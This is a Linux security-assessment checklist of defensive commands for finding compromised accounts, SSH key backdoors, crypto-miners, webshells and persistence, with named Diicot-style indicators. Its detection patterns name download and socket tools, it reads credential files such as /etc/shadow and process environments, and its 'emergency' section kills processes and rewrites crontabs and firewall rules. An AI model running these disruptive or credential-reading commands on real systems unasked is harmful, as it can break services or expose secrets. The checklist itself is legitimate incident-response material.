Security Assessment Checklist: Essential Commands for Linux System Analysis
User Account Security
cat /etc/passwd | grep -E "sh$|bash$" # List users with shell access
grep -E "^[^:]*:[^:]*:0:" /etc/passwd # Find users with UID 0 (root privileges)
last | head -20 # Show recent login history
lastb | head -20 # Show failed login attempts
who # Show currently logged in users
w # Show who is logged on and what they're doing
id # Show current user ID and groups
groups # List groups for current user
sudo -l # List sudo privileges for current user
SSH Security Assessment
cat ~/.ssh/authorized_keys # Check SSH keys for current user
cat /root/.ssh/authorized_keys # Check SSH keys for root (if accessible)
find /home -name "authorized_keys" -exec cat {} \; # Find all SSH authorized_keys files
ss -tlnp | grep :22 # Check SSH service status and port
cat /etc/ssh/sshd_config | grep -E "PermitRoot|PasswordAuth|PubkeyAuth" # Review SSH configuration
journalctl -u ssh | tail -50 # Check SSH service logs
grep "Failed password" /var/log/auth.log | tail -20 # Find recent failed SSH attempts
Process and Service Analysis
ps aux --sort=-%cpu | head -20 # Show processes by CPU usage
ps aux --sort=-%mem | head -20 # Show processes by memory usage
ps aux | grep -E "(crypto|mine|xmr|diicot|b4nd1d0)" # Look for cryptocurrency mining processes
pstree -p # Show process tree with PIDs
top -n 1 -b | head -20 # Get system snapshot
systemctl list-units --type=service --state=running # List running services
systemctl list-units --type=service --state=failed # List failed services
systemctl status # Overall system status
Network Security Check
ss -tulnp # Show listening ports and processes
netstat -tulnp # Alternative way to show network connections
ss -tp # Show established TCP connections
lsof -i # Show files opened by network connections
iptables -L -n # List firewall rules (if using iptables)
ufw status # Check UFW firewall status
cat /etc/hosts | grep -v "^#" # Check hosts file for suspicious entries
nmap localhost # Scan local ports (if nmap available)
File System Security
find / -type f -perm -4000 2>/dev/null # Find SUID files
find / -type f -perm -2000 2>/dev/null # Find SGID files
find /tmp -type f -name ".*" 2>/dev/null # Find hidden files in /tmp
find /var/tmp -type f -name ".*" 2>/dev/null # Find hidden files in /var/tmp
lsattr /var/tmp/* 2>/dev/null | grep "^....i" # Find files with immutable attribute
ls -la /tmp /var/tmp /dev/shm # Check temporary directories
find / -name "*.elf" -o -name "*miner*" -o -name "*crypto*" 2>/dev/null # Look for mining binaries
df -h # Check disk usage
Scheduled Tasks and Automation
crontab -l # Show current user's cron jobs
sudo crontab -l # Show root's cron jobs
cat /etc/crontab # Check system-wide cron jobs
ls -la /etc/cron.d/ # List cron.d directory contents
ls -la /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/ # Check cron directories
systemctl list-timers # Show systemd timers
at -l # List scheduled at jobs
System Logs Analysis
journalctl --since "1 hour ago" | grep -i error # Recent error messages
journalctl --since "1 hour ago" | grep -i fail # Recent failure messages
tail -50 /var/log/syslog # Check system log
tail -50 /var/log/auth.log # Check authentication log
dmesg | grep -i error # Check kernel messages for errors
grep -i "sudo" /var/log/auth.log | tail -20 # Recent sudo usage
lastlog | grep -v "Never" # Show last login times for all users
Package and Software Security
dpkg -l | grep -E "(crypto|mine|xmr)" # Look for suspicious packages (Debian/Ubuntu)
rpm -qa | grep -E "(crypto|mine|xmr)" # Look for suspicious packages (RHEL/CentOS)
apt list --installed | grep -E "(crypto|mine|xmr)" # Alternative package check
which wget curl # Check if download tools are available
ls -la /usr/bin/ | grep -E "(ssh|sshd)" # Look for suspicious SSH-related binaries
find /usr/bin /usr/sbin -name ".*" 2>/dev/null # Find hidden binaries
Rootkit and Malware Detection
rkhunter --check --skip-keypress # Run rootkit hunter (if installed)
chkrootkit # Run chkrootkit scanner (if installed)
find / -name "core" -type f 2>/dev/null # Look for core dumps
lsmod | grep -E "(suspicious|unknown)" # Check loaded kernel modules
cat /proc/modules # List all loaded modules
Network Configuration
cat /etc/resolv.conf # Check DNS configuration
ip route show # Show routing table
ip addr show # Show network interfaces
cat /etc/network/interfaces # Check network configuration (Debian/Ubuntu)
systemctl status systemd-resolved # Check DNS resolver status
resolvectl status # Show DNS resolver status
Quick Security Summary Commands
# One-liner system overview
ps aux --sort=-%cpu | head -5; ss -tlnp | grep -E ":(22|80|443|3389)"; crontab -l; last | head -5
# Quick malware check
ps aux | grep -E "(crypto|mine|xmr|diicot|Opera)" | grep -v grep; find /tmp /var/tmp -name ".*" -type f 2>/dev/null
# Essential security files check
ls -la ~/.ssh/authorized_keys /root/.ssh/authorized_keys /etc/passwd /etc/shadow 2>/dev/null
# Network security overview
ss -tulnp | grep -E ":(4444|3333|5555|7777|8080)"; cat /etc/hosts | grep -v "^#\|^$"
Common Hacker Hiding Places
# Web application directories - common webshell locations
find /var/www -name "*.php" -exec grep -l "eval\|system\|exec\|shell_exec" {} \; 2>/dev/null
find /var/www -name "*.jsp" -o -name "*.aspx" -o -name "*.cgi" 2>/dev/null
ls -la /var/www/html/ /usr/share/nginx/html/ /opt/lampp/htdocs/ 2>/dev/null
find /var/www -name "*.txt" -o -name "*.log" -exec file {} \; 2>/dev/null | grep -i script
# Configuration and profile files - persistence mechanisms
cat ~/.bashrc ~/.bash_profile ~/.profile ~/.zshrc 2>/dev/null | grep -E "(wget|curl|base64|eval)"
cat /root/.bashrc /root/.bash_profile /root/.profile 2>/dev/null | grep -E "(wget|curl|base64|eval)"
find /home -name ".bashrc" -o -name ".profile" -o -name ".bash_profile" -exec grep -l "wget\|curl\|base64" {} \; 2>/dev/null
cat /etc/bash.bashrc /etc/profile 2>/dev/null | grep -E "(wget|curl|base64|eval)"
# Library directories - LD_PRELOAD attacks and backdoors
ls -la /lib/x86_64-linux-gnu/ /usr/lib/x86_64-linux-gnu/ | grep -E "\.so\.[0-9]+$" | tail -20
find /lib /usr/lib -name "*.so*" -newer /etc/passwd 2>/dev/null
ldd /bin/bash | grep -v "^\\s*/"
cat /etc/ld.so.preload 2>/dev/null
# Kernel module backdoors
lsmod | head -20
find /lib/modules/$(uname -r) -name "*.ko" -newer /etc/passwd 2>/dev/null
modinfo $(lsmod | awk 'NR>1 {print $1}') 2>/dev/null | grep -E "^(filename|description)" | paste - -
# Process memory and environment
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -E "(HISTFILE|PATH|LD_)" | head -20
ls -la /proc/*/fd/ 2>/dev/null | grep -E "(socket|pipe|deleted)" | head -10
find /proc -name "maps" -exec grep -l "deleted\|suspicious" {} \; 2>/dev/null
# Binary modifications and rootkits
find /bin /sbin /usr/bin /usr/sbin -type f -newer /etc/passwd 2>/dev/null
ls -la /bin/sh /bin/bash /usr/bin/sudo /usr/bin/su | grep -v "^l"
strings /bin/bash | grep -E "(backdoor|rootkit|hidden)" 2>/dev/null
stat /bin/bash /bin/sh /usr/bin/sudo | grep -E "^(Modify|Change):"
# Hidden directories and files
find / -type d -name ".*" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -20
find /usr -type d -name ".*" 2>/dev/null
find /opt -type d -name ".*" 2>/dev/null
find /var -type d -name ".*" 2>/dev/null
# Application-specific hiding spots
find /var/spool -type f -name ".*" 2>/dev/null
find /var/cache -type f -name ".*" 2>/dev/null
ls -la /var/backups/ /var/mail/ /var/spool/ 2>/dev/null
find /usr/share -type f -executable 2>/dev/null | head -10
# Database and log tampering
find /var/log -name "*.log" -size 0 2>/dev/null
find /var/log -name "*.log" -mtime -1 -exec ls -la {} \; 2>/dev/null
tail -5 /var/log/wtmp /var/log/btmp 2>/dev/null
lastlog | grep -E "(Never logged in|root|admin)" | head -10
# Memory-only attacks detection
ps aux | awk '{print $2}' | while read pid; do [ -d "/proc/$pid" ] && ls -la "/proc/$pid/fd/" 2>/dev/null | grep -E "(socket|pipe)" | head -2; done | head -20
netstat -anp | grep -E "ESTABLISHED|LISTEN" | grep -v "127.0.0.1" | head -15
ss -tulpn | grep -v "127.0.0.1" | head -15
Advanced Persistence Detection
# Systemd service backdoors
find /etc/systemd/system /lib/systemd/system -name "*.service" -exec grep -l "ExecStart.*tmp\|ExecStart.*var" {} \; 2>/dev/null
systemctl list-unit-files | grep -E "(enabled|static)" | grep -v "@" | head -20
find /etc/systemd/system -name "*.service" -newer /etc/passwd 2>/dev/null
# Init system backdoors
ls -la /etc/init.d/ | grep -E "^-.*x.*x"
find /etc/init.d -type f -newer /etc/passwd 2>/dev/null
cat /etc/inittab 2>/dev/null | grep -v "^#"
# Scheduled task hiding places
find /var/spool/cron -type f 2>/dev/null
ls -la /var/spool/anacron/ 2>/dev/null
cat /etc/anacrontab 2>/dev/null
find /etc -name "*cron*" -type f 2>/dev/null
# Network service backdoors
find /etc/xinetd.d -type f 2>/dev/null
cat /etc/inetd.conf 2>/dev/null | grep -v "^#"
ls -la /etc/systemd/system/multi-user.target.wants/ | grep -E "(network|ssh|http)"
# Container and virtualization backdoors
docker ps -a 2>/dev/null
docker images 2>/dev/null | grep -E "(latest|none)"
ls -la /var/lib/docker/ 2>/dev/null
find /var/lib/lxc /var/lib/lxd -type f 2>/dev/null
# Firmware and bootloader
dmesg | grep -i -E "(firmware|microcode|boot)" | head -10
ls -la /boot/ | grep -E "vmlinuz|initrd" | head -5
cat /proc/cmdline
# Network configuration tampering
cat /etc/hosts | grep -v "^#" | grep -v "^$"
find /etc/network -name "*.conf" -o -name "interfaces*" 2>/dev/null
cat /etc/systemd/resolved.conf 2>/dev/null | grep -v "^#"
Emergency Response Commands
# Kill suspicious processes immediately
pkill -f "crypto\|mine\|xmr\|diicot\|b4nd1d0"
# Check for immediate threats
ps aux | grep -E "(Opera|diicot|b4nd1d0|cache|xmrig)" | grep -v grep
# Quick file cleanup check
find /var/tmp /tmp -name ".*" -type f | grep -E "(diicot|b4nd1d0|crypto)"
# Emergency cron cleanup
crontab -l | grep -v "diicot\|b4nd1d0\|Documents" | crontab -
# SSH key emergency check
grep -E "(ElPatrono1337|id_rsa_free)" ~/.ssh/authorized_keys /root/.ssh/authorized_keys 2>/dev/null
# Emergency process and network isolation
pkill -f -9 "wget\|curl.*base64\|python.*socket\|perl.*socket"
iptables -A OUTPUT -p tcp --dport 4444 -j DROP 2>/dev/null
iptables -A OUTPUT -p tcp --dport 3333 -j DROP 2>/dev/null
netstat -anp | grep -E "ESTABLISHED.*:4444|ESTABLISHED.*:3333" | awk '{print $7}' | cut -d'/' -f1 | xargs kill -9 2>/dev/null
This security assessment checklist provides essential Linux commands for system analysis, threat detection, and security auditing. Use these commands systematically to identify potential security issues and maintain system integrity.